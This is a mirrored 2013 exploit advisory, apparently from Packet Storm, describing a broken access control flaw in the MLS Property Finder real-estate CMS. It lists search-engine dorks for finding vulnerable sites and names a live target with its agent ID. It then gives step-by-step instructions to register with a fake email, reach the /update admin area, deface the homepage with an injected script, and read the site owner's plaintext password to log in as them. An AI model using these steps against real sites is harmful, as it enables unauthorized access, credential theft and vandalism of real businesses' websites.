Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline

MLS Property Finder Improper Access Control

🗓️ 08 Mar 2013 00:00:00Reported by X-CisadaneType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 31 Views

MLS Property Finder Improper Access Contro

Show more
Code
`===========================================================   
MLS Property Finder Improper Access Control Vulnerability   
===========================================================   
  
:-----------------------------------------------------------------------------------------------------------------------:   
: # Exploit Title : MLS Property Finder Improper Access Control Vulnerability   
: # Date : 08 March 2013   
: # Author : X-Cisadane   
: # Vendor : http://www.mlspropertyfinder.com/ AND http://www.rls2000.com/   
: # Version : All Versions   
: # Category : Web Applications   
: # Vulnerability : Improper Access Control Vulnerability   
: # Tested On : Google Chrome 24.0.1312.52 m (Windows XP Professional SP 3 32-Bit EN US)   
: # Greetz To : X-Code, Borneo Crew, Depok Cyber, Explore Crew, CodeNesia, Jakarta Anonymous Club, Bogor-H, Jabar Cyber   
:-----------------------------------------------------------------------------------------------------------------------:   
  
DORKS (How to find the target) :   
================================   
intext:How can MLS Property Finder benefit you   
intext:"Do not use commas in your figures" inurl:calculator.asp   
inurl:/register.asp?agentid=   
intext:"Sign up for MLS Property Finder - "   
intext:Take advantage of my FREE MLS Property Finder service   
inurl:/detail_agent.asp?agentid=   
inurl:/searchNEW.asp   
intext:"Fill out the form below for a market analysis"   
inurl:/listing.asp?SearchType=ByOffice   
intext:daily email updates, and much more with MLS Property Finder.  
  
  
Proof of Concept   
=================   
The website (CMS) does not restrict access to the "/update" path to a registered member. A registered member can access into the   
Website CMS Manager and Managing the Website through "/update" path via URL without Realtor (Site Author) Privilege!   
  
For Example :   
Live Target : http://www.gowithcraig.com/register.asp?agentid=406764   
  
1st. Sign up into the Website by Clicking 'Sign up for MLS Property Finder now' or through http://www.gowithcraig.com/register.asp?agentid=406764&s=contact   
2nd. In the Registration Page, fill your contact information (just for formality). Fill the first name, last name, fake email address, etc.   
Pic : http://i50.tinypic.com/2qn4207.png   
  
3rd. Next click '>> Step 2'. After Search Criteria Form appeared you've to fill out that (just for formality). Then click Submit.   
Pic : http://i49.tinypic.com/4l35nn.png  
  
4th. Afer you've Clicked Submit button and if the Registration Process was sucessfull, this notification will appear : Thank you, For signing up for my MLS Property Finder,   
you will receive an email with your username, password and instructions on how to log in to see your listings. Click here to view information on your properties selection.   
Pic : http://i48.tinypic.com/33vj9zr.png   
  
5th. Just click : 'Click here' and you has entered the Site within 'Registered Member' feature/privilege.   
Pic : http://i45.tinypic.com/2d8q23a.png   
  
Now, How we can step into the Site Manager???   
Look at your URL Bar, if the URL is http://www.mlspropertyfinder.com/home/home.asp You've to change into http://www.mlspropertyfinder.com/update/   
Pic : http://i47.tinypic.com/w17l9t.png   
Voila!!! Now you can Manage the site :)  
  
If you wanna ruin (Deface) the Site, just replace the content of Site Homepage through http://www.mlspropertyfinder.com/update/update_websiteinfo.asp   
Pic : http://i47.tinypic.com/a2u72w.png   
And then Click Edit Content. After that, Click Front Page.   
Pic : http://i48.tinypic.com/24phs8p.png   
And the HTML Editor/Page Editor will show.   
Just fill Meta Title with : Defaced By Your Nick Name.   
And fill the Body (CLICK HTML<> BUTTON) with this Script : <script>document.body.innerHTML="<h1>0WN3D</h1>This Site 0WN3D BY : Your Nick Name<br/>";</script>   
Pic : http://i46.tinypic.com/muu0q1.png   
Click Apply and OK! And Submit. Check the Site (http://www.gowithcraig.com) and Voila!!! Defaced!!!   
Pic : http://i50.tinypic.com/1zofdz4.png  
  
If you wanna find the Realtor Agent (Site Author), just go to http://www.mlspropertyfinder.com/update/agents/   
Pic : http://i46.tinypic.com/optkb5.png   
Look at the Password : paper (Based on my picture above). After you got the password, now you can login as the Realtor Agent (Site Author) through http://www.gowithcraig.com/update/   
Fill Username with the AgentID : 406764 and Fill Password with : paper   
Pic : http://i50.tinypic.com/24czloy.png   
Q : Where can I find the AgentID?   
A : AgentID appeared in URL Bar while you in the Register Page, If you've forgotten the AgentID just go through the Registration Page :)  
  
If the Username and Password was right, now you can login As Realtor Agent (Site Author)   
Pic : http://i49.tinypic.com/296iyid.png   
  
As the alternative Login page for Site Author you can use this Site http://www.rls2000.com/search/login.asp  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
08 Mar 2013 00:00Current
0.6Low risk
Vulners AI Score0.6
web applicationsimproper access controlvulnerabilitygoogle chrome 24.0.1312.52windows xp professional sp 3url barmeta titlehtml editor/page editordeface
31
.json
Report